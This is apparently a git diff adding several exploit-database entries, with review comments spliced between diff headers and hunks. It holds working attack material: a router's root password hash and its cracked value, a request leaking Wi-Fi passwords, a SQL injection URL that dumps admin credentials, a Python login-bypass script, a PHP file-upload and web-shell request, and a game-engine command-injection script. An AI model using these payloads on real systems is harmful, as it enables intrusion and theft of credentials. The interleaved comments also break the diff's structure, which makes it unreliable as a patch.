diff --git a/exploits/hardware/webapps/48382.txt b/exploits/hardware/webapps/48382.txt
new file mode 100644
index 000000000..12bc9d912
--- /dev/null
+++ b/exploits/hardware/webapps/48382.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root)
+# Date: 2020-04-25
+# Author: Besim ALTINOK
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
+# Version: V1.2.32533
+# Tested on: Netis E1+ V1.2.32533
+# Credit: İsmail BOZKURT
+-----------------------------
+
+*root:abSQTPcIskFGc:0:0:root:/:/bin/sh*
+
+
+Created directory: /home/pentestertraining/.john
+Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
+Press 'q' or Ctrl-C to abort, almost any other key for status
+Warning: MaxLen = 13 is too large for the current hash type, reduced
+to 8*realtek (root)*
+1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
\ No newline at end of file
diff --git a/exploits/hardware/webapps/48384.txt b/exploits/hardware/webapps/48384.txt
new file mode 100644
index 000000000..a1f8c1171
--- /dev/null
+++ b/exploits/hardware/webapps/48384.txt
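Review bot: The advisory shows the `/etc/passwd` line and the john session that recovers `realtek`, but never says how the hash was obtained or which service accepts a root login, so a reader cannot tell whether this is reachable over the network or only from an extracted firmware image; the `# Software Link` pointing at a firmware download suggests the latter, but that is an inference. I would add a line before the passwd entry such as `# Source: /etc/passwd from the unpacked firmware image; root login accepted on <telnet/ssh/...> from the LAN side` with the actual service filled in, or state explicitly that no remote login was confirmed. It is also worth noting that the hash is traditional DES crypt, which john caps at 8 characters (the `MaxLen = 13 ... reduced to 8` warning shows this), so the whole password space is brute-forceable in minutes and simply rotating the password without changing the hash scheme would not be a fix.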
@@ -0,0 +1,31 @@
+# Exploit Title: Netis E1+ 1.2.32533 - Unauthenticated WiFi Password Leak
+# Date: 2020-04-25
+# Author: Besim ALTINOK
+# Vendor Homepage: http://www.netis-systems.com
+# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
+# Version: V1.2.32533
+# Tested on: Netis E1+ V1.2.32533
+# Credit: İsmail BOZKURT
+-----------------------------
+
+HTTP Request
+-------------------------------------------
+GET //netcore_get.cgi HTTP/1.1
+Host: netisext.cc
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
+Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: homeFirstShow=yes
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+
+Detail of the HTTP Response:
+-------------------------------------------
+hange_name':'[ ]','ddns_domain':'','ddns_info':'[ ]','time_now':'01/14/2015
+09:58:51','timezone':'-8
+1','time_type':'1','daylight_save':'1','time_server':'65.55.56.206','time_date':'2015','time_date2':'1','time_date3':'14','time_time':'9','time_time2':'58','time_time3':'51','old_user':'','def_pwd_flag':'1','old_pwd':'','wakeup_mac':'00:00:00:00:00:00','rp_config_status':'35','rp_client_status':'3','rp_ap_ssid':'ExampleSSID','rp_ap_password':'WiFiPass123','rp_ap_users':'1','rp_client_ssid':'TestSSID','rp_client_bssid':'98:e7:f5:ab:95:ad','rp_client_password':'WiFiPass123','rp_client_time':'357','rp_client_signals':'65','rp_client_speeds':'117','rp_roaming_onoff':'16','rp_soon_ssid':'TestSSID','rp_soon_password':'WiFiPass123','rr_current_mode':'1','rp_diagnose_status':'0',"statistics_list":[{'type':'LAN','tx_pack':'0','rx_pack':'0','t
\ No newline at end of file
diff --git a/exploits/php/webapps/48381.txt b/exploits/php/webapps/48381.txt
new file mode 100644
index 000000000..a8b0b3b59
--- /dev/null
+++ b/exploits/php/webapps/48381.txt
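Review bot: The request is `GET //netcore_get.cgi` with a doubled leading slash and the text never says whether that is what defeats authentication or whether `/netcore_get.cgi` is served unauthenticated as well; if the `//` is required this is a path-normalization bypass and the root cause belongs in the description. I would add a line under the request such as `# Note: the same request with a single leading slash returns <401/redirect>; the // prefix skips the auth check` filled in with what was actually observed. The response also shows more than the title claims — `rp_ap_password`, `rp_client_password` and `rp_soon_password` plus `rp_client_bssid` — so the impact statement should say the extender leaks both its own Wi-Fi credentials and those of the upstream AP it repeats. The body excerpt is truncated mid-field (`'t`) and uses mixed quoting, so it should be labelled as a partial capture rather than the verbatim response.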
@@ -0,0 +1,52 @@
+# Exploit Title: PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload
+# Date: 2020-04-24
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.php-fusion.co.uk/home.php
+# Software Link: https://sourceforge.net/projects/php-fusion/files/PHP-Fusion%20Archives/9.x/PHP-Fusion%209.03.50.zip/download
+# Version: v9.03.50
+# Tested on: Xampp
+# Credit: İsmail BOZKURT and AkkuS
+
+-------------------------------------------------------------------------------------------------
+Description
+---
+- This system does not check the file extension when user upload photo for
+avatar :). So you can upload PHP file like:
+
+Content of the file
+--
+Sample PHP code: phpinfo(); ?>
+
+Name of the file:
+---
+Sample PHP File name: tester.php
+
+- When you want to try to upload the image to the avatar, just, try to
+change the file name and content.
+
+----------------------------------------------------------------------------------------
+Vulnerable code section in the UserFieldsInput.inc
+----------------------------------------------------------
+ private function _setUserAvatar() {
+ if (isset($_POST['delAvatar'])) {
+ if ($this->userData['user_avatar'] != "" &&
+file_exists(IMAGES."avatars/".$this->userData['user_avatar']) &&
+is_file(IMAGES."avatars/".$this->userData['user_avatar'])) {
+ unlink(IMAGES."avatars/".$this->userData['user_avatar']);
+ }
+ $this->data['user_avatar'] = '';
+ }
+ if (isset($_FILES['user_avatar']) &&
+$_FILES['user_avatar']['name']) { // uploaded avatar
+ if (!empty($_FILES['user_avatar']) &&
+is_uploaded_file($_FILES['user_avatar']['tmp_name'])) {
+ $upload = form_sanitizer($_FILES['user_avatar'], '',
+'user_avatar');
+ if (isset($upload['error']) && !$upload['error']) {
+ // ^ maybe use empty($upload['error']) also can but
+maybe low end php version has problem on empty.
+ $this->data['user_avatar'] = $upload['image_name'];
+ }
+ }
+ }
+ }
\ No newline at end of file
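Review bot: The sample payload `Sample PHP code: phpinfo(); ?>` has a closing tag but no opening one, so as committed it is not executable PHP; it should read `Sample PHP code: <?php phpinfo(); ?>` (the `<?php` was most likely eaten when the text was rendered, but the file is what readers copy). The quoted `_setUserAvatar()` delegates all validation to `form_sanitizer($_FILES['user_avatar'], '', 'user_avatar')`, which is not shown, so the claim that no extension check happens rests on that helper and the field's configuration rather than on anything visible here; one line on what `form_sanitizer` does (or does not do) with the `user_avatar` field would make the root cause verifiable. It would also help to say where the file lands — the delete branch implies `IMAGES."avatars/"` — so a reader can confirm the upload is reachable and executed.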
diff --git a/exploits/php/webapps/48383.txt b/exploits/php/webapps/48383.txt
new file mode 100644
index 000000000..241aaaa32
--- /dev/null
+++ b/exploits/php/webapps/48383.txt
@@ -0,0 +1,25 @@
+# Exploit Title: Online shopping system advanced 1.0 - 'p' SQL Injection
+# Exploit Author : Majid kalantari
+# Date: 2020-04-26
+# Vendor Homepage : https://github.com/PuneethReddyHC/online-shopping-system-advanced
+# Software link: https://github.com/PuneethReddyHC/online-shopping-system-advanced/archive/master.zip
+# Version: -
+# Tested on: Windows 10
+# CVE: N/A
+===============================================
+
+# vulnerable file: product.php
+
+# vulnerable parameter : p
+
+# payload :
+http://127.0.0.1:8081/phps/product.php?p=-10+union+select+1,2,3,concat(admin_email,%27----%27,admin_password),5,6,7,8+from+admin_info%23#
+!
+
+#Description: ($product_id input is not safe)
+
+Line 46:
+$product_id = $_GET['p'];
+$sql = " SELECT * FROM products ";
+$sql = " SELECT * FROM products WHERE product_id = $product_id";
+===============================================
\ No newline at end of file
diff --git a/exploits/php/webapps/48385.txt b/exploits/php/webapps/48385.txt
new file mode 100644
index 000000000..3db807800
--- /dev/null
+++ b/exploits/php/webapps/48385.txt
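Review bot: The payload URL ends in `%23#` and is followed by a line holding only `!`; `%23` is the encoded `#` that comments out the rest of the query, but the literal `#` after it starts a URL fragment the client never sends and the `!` looks like a wrapping artifact, so the URL should be given as a single line ending in `%23`. The product.php snippet shows the second `$sql` assignment interpolating `$_GET['p']` unquoted, which is why a numeric `-10 union select ...` works with no quote break-out; the fix is a prepared statement, e.g. `$stmt = $db->prepare("SELECT * FROM products WHERE product_id = ?"); $stmt->bind_param("i", $_GET['p']);` using whatever handle product.php holds. The `union select 1,...,8` column count and the `admin_info` table name are specific to this schema and should be stated as such so readers do not assume the payload is generic.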
@@ -0,0 +1,69 @@
+# Exploit Title: Online Course Registration 2.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-04-25
+# Exploit Author: Daniel Monzón (stark0de)
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/online-course-registration-free-download/
+# Version: 2.0
+# Tested on: Kali Linux x64 5.4.0
+# CVE : N/A
+
+#There are multiple SQL injection vulnerabilities in Online Course Registration #PHP script:
+
+#./check_availability.php: $result =mysqli_query($con,"SELECT studentRegno FROM courseenrolls WHERE course='$cid' and studentRegno=' $regid'");
+#./check_availability.php: $result =mysqli_query($con,"SELECT * FROM courseenrolls WHERE course='$cid'");
+#./check_availability.php: $result1 =mysqli_query($con,"SELECT noofSeats FROM course WHERE id='$cid'");
+#./change-password.php:$sql=mysqli_query($con,"SELECT password FROM students where password='".md5($_POST['cpass'])."' && studentRegno='".$_SESSION['login']."'");
+#./admin/check_availability.php: $result =mysqli_query($con,"SELECT StudentRegno FROM students WHERE StudentRegno='$regno'");
+#./admin/change-password.php:$sql=mysqli_query($con,"SELECT password FROM admin where password='".md5($_POST['cpass'])."' && username='".$_SESSION['alogin']."'");
+#./admin/index.php:$query=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'");
+#./index.php:$query=mysqli_query($con,"SELECT * FROM students WHERE StudentRegno='$regno' and password='$password'");
+#./includes/header.php: $ret=mysqli_query($con,"SELECT * from userlog where studentRegno='".$_SESSION['login']."' order by id desc limit 1,1");
+#./pincode-verification.php:$sql=mysqli_query($con,"SELECT * FROM students where pincode='".trim($_POST['pincode'])."' && StudentRegno='".$_SESSION['login']."'");
+
+#It is also possible to bypass the authentication in the two login pages:
+#!/usr/bin/python3
+try:
+ from termcolor import colored
+ from colorama import init
+ import argparse
+ import requests
+except:
+ print("Please run pip3 install termcolor,colorama,argparse,requests")
+
+init()
+
+symbol_green=colored("[+]", 'green')
+symbol_red=colored("[-]", 'red')
+
+parser = argparse.ArgumentParser()
+parser.add_argument('url', help='The URL of the target.')
+args = parser.parse_args()
+
+adminurl = args.url + '/onlinecourse/admin/'
+
+
+
+def main():
+ initial='Online Course Registration Authentication Bypass in %s' % ( args.url ) + "\n"
+ print(colored(initial, 'yellow'))
+ sess = requests.session()
+ data_login = {
+ 'username': "admin' or 1=1 -- ",
+ 'password': 'whatever',
+ 'submit': ''
+}
+ try:
+ req = sess.post(adminurl, data=data_login, verify=False, allow_redirects=True)
+ resp_code = req.status_code
+ except:
+ print(symbol_red+" The request didn't work!\n")
+ exit()
+ if resp_code == 200 and "document.chngpwd.cpass.value" in req.text:
+ print(symbol_green+" Authentication bypassed for admin user!\n")
+ print(symbol_green+" To test this manually, visit: " + adminurl+ " and enter: admin' or 1=1 -- in the username field and whatever in password field, then click the Log Me In button\n")
+
+ else:
+ print(symbol_red+" Fail!")
+
+main()
\ No newline at end of file
diff --git a/exploits/php/webapps/48386.txt b/exploits/php/webapps/48386.txt
new file mode 100644
index 000000000..99e62d950
--- /dev/null
+++ b/exploits/php/webapps/48386.txt
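Review bot: The import `except:` prints an install hint but lets execution continue, so a missing `requests` or `termcolor` fails a few lines later on `init()` / `colored(...)` with a NameError instead of the friendly message; it should be `except ImportError as e:` followed by the print and `sys.exit(1)` (with `import sys` added, and `argparse` dropped from the pip list since it is standard library). The bare `except:` around `sess.post` likewise hides the reason and also swallows KeyboardInterrupt — catch `requests.RequestException as e` and print `e`. The success test `resp_code == 200 and "document.chngpwd.cpass.value" in req.text` is a fingerprint of one version's post-login page and will report `Fail!` on any other build even when the bypass worked, which deserves a comment such as `# fingerprint of admin/change-password form in 2.0; adjust for other versions`. The payload `admin' or 1=1 -- ` keeps the trailing space MySQL requires after `--`, which is correct against the quoted `username='$username'` in the admin/index.php line above; worth noting so nobody "cleans" it away.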
@@ -0,0 +1,170 @@
+# Exploit Title: Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-04-26
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.maiansupport.com
+# Software Link: https://www.maiansupport.com/zip.html
+# Version: v4.3
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+----------------------------------------------
+
+Here is the Detail:
+--------------------------------------------------
+This product is unprotected against CSRF vulnerabilities. With this attack,
+you can add an admin account to the system. In addition, you can add files
+from the F.A.Q field as admin.There are no file restrictions here.
+Therefore, you can upload a PHP file here with CSRF.
+
+If you want, you can add an admin account first and then access the system
+and upload files.
+Or you can upload files with direct admin rights.
+
+---------------------------------------------------
+CSRF PoC - 1 (Add Administrator user)
+-------------------------------------
+
+
+
+
+
+
+
+- After the Add admin account, you can upload the PHP file.
+
+CSRF PoC 2 - ( Directly, File Upload)
+----------------------------------------------------
+
+
+
+
+
+
+
+
+HTTP Request:
+-----------------------------------------------------------------------------------------
+GET /helpdesk/content/attachments-faq/shell.php?cmd=ls HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:68.0)
+Gecko/20100101 Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=4574c8e8190d39edd9d13a0fd9a502ec;
+bp_ut_session={"pageviews":1,"referrer":"
+http://localhost/olms/library/assets/js/images/","landingPage":"
+http://localhost/olms/library/assets/js/images/sort_asc.html
+","started":1587817504988};
+HESKb910af33bb5d80030b1f4b6f8666b57fac433d4d=71c43ff24f63f83f5a34d28997251db6
+Upgrade-Insecure-Requests: 1
+
+HTTP Response:
+-------------------------------------------------------------------------------------------------
+HTTP/1.1 200 OK
+Date: Sun, 26 Apr 2020 12:15:31 GMT
+Server: Apache/2.4.43 (Unix) OpenSSL/1.1.1f PHP/7.2.29 mod_perl/2.0.8-dev
+Perl/v5.16.3
+X-Powered-By: PHP/7.2.29
+Content-Length: 39
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+shell.php
+shell_test.php
+shell_test.php
\ No newline at end of file
diff --git a/exploits/windows/local/48387.txt b/exploits/windows/local/48387.txt
new file mode 100644
index 000000000..3db90cdc7
--- /dev/null
+++ b/exploits/windows/local/48387.txt
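Review bot: Both PoC sections are empty in the hunk — nothing follows `CSRF PoC - 1 (Add Administrator user)` or `CSRF PoC 2 - ( Directly, File Upload)` except blank lines — so the file as committed names neither the target endpoint nor the form field names needed to reproduce the add-admin or upload request; this may be the HTML forms having been stripped on rendering, but the advisory should carry at least the `action` URL and parameter names in plain text so it survives that. The request/response shown only proves that `content/attachments-faq/shell.php?cmd=ls` executes after an upload, not how the upload is triggered. The `Cookie:` header also mixes a `PHPSESSID`, a `bp_ut_session` pointing at `localhost/olms/...` and a `HESK...` cookie from other test applications on the same host; trimming it to what Maian Support sets would avoid confusion about which session the PoC depends on. Stating the precondition explicitly — the victim is logged in as admin and merely visits the attacker's page — would also help, since the text currently implies it without saying it.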
@@ -0,0 +1,32 @@
+# Exploit Title: Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution
+# Date: 2020-04-27
+# Exploit Author: 0xEmma/BugByte/SebastianPC
+# Vendor Homepage: https://www.valvesoftware.com/en/
+# Version: Source Engine, Tested on CS:GO BuildID: 4937372 TF2 BuildID: 4871679 Garry's Mod BuildID: 4803834 Half Life 2 BuildID: 4233302
+# Tested on: MacOS 15.3
+# CVE : N/A
+
+import os, random, sys
+banner = """
+:'######:::'#######::'##::::'##::'######:::'#######::'##:::'##::::'##:::'########:
+'##... ##:'##.... ##: ##:::: ##:'##... ##:'##.... ##: ##::'##:::'####:::... ##..::
+ ##:::..:: ##'### ##: ##:::: ##: ##:::..::..::::: ##: ##:'##::::.. ##:::::: ##::::
+. ######:: ## ### ##: ##:::: ##: ##::::::::'#######:: #####::::::: ##:::::: ##::::
+:..... ##: ## #####:: ##:::: ##: ##::::::::...... ##: ##. ##:::::: ##:::::: ##::::
+'##::: ##: ##.....::: ##:::: ##: ##::: ##:'##:::: ##: ##:. ##::::: ##:::::: ##::::
+. ######::. #######::. #######::. ######::. #######:: ##::. ##::'######:::: ##::::
+:......::::.......::::.......::::......::::.......:::..::::..:::......:::::..:::::
+"""
+print(banner)
+
+
+if os.name == "posix":
+ command = str(input("Code to run? "))
+ payload = '"; ' + command + '; echo "'
+ f = open("/tmp/hl2_relaunch", "w")
+
+ f.write(payload)
+ f.close()
+
+if os.name == "nt":
+ print("Windows based OS's not supported, see CVE-2020-12242")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index b1b0f9065..cd1147589
--- a/files_exploits.csv
+++ b/files_exploits.csv
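Review bot: The script only does anything when `os.name == "posix"` and explicitly prints that Windows is not supported, yet the file is added under `exploits/windows/local/` and the CSV row in this same commit catalogues it as platform `windows`; the path and the index entry look wrong (macOS/Linux, or `multiple`, would match the `# Tested on: MacOS` header) and should be fixed or the mismatch explained in the header. The advisory never says what consumes `/tmp/hl2_relaunch` or why the payload is quoted as `"; <cmd>; echo "`, so a comment above `payload = ...` along the lines of `# hl2_relaunch contents are interpolated into a shell command by the game's relaunch logic; closing the quote injects <cmd>` (confirm the exact consumer) would make the mechanism reviewable, and it would also make clear that the fixed, predictable path in `/tmp` is the point. The file write should be `with open("/tmp/hl2_relaunch", "w") as f: f.write(payload)` so the handle is closed on error, and `random` and `sys` are imported but never used.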
@@ -11039,6 +11039,7 @@ id,file,description,date,author,type,platform,port
 48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris,
 48364,exploits/windows/local/48364.py,"RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)",2020-04-22,"Felipe Winsnes",local,windows,
 48378,exploits/windows/local/48378.txt,"Popcorn Time 6.2 - 'Update service' Unquoted Service Path",2020-04-24,"Uriel Yochpaz",local,windows,
+48387,exploits/windows/local/48387.txt,"Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution",2020-04-27,0xEmma,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -42615,3 +42616,9 @@ id,file,description,date,author,type,platform,port
 48376,exploits/multiple/webapps/48376.txt,"EspoCRM 5.8.5 - Privilege Escalation",2020-04-24,Besim,webapps,multiple,
 48377,exploits/hardware/webapps/48377.txt,"Edimax EW-7438RPn 1.13 - Remote Code Execution",2020-04-24,Besim,webapps,hardware,
 48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,
+48381,exploits/php/webapps/48381.txt,"PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload",2020-04-27,Besim,webapps,php,
+48382,exploits/hardware/webapps/48382.txt,"Netis E1+ 1.2.32533 - Backdoor Account (root)",2020-04-27,Besim,webapps,hardware,
+48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,
+48384,exploits/hardware/webapps/48384.txt,"Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak",2020-04-27,Besim,webapps,hardware,
+48385,exploits/php/webapps/48385.txt,"Online Course Registration 2.0 - Authentication Bypass",2020-04-27,"Daniel Monzón",webapps,php,
+48386,exploits/php/webapps/48386.txt,"Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)",2020-04-27,Besim,webapps,php,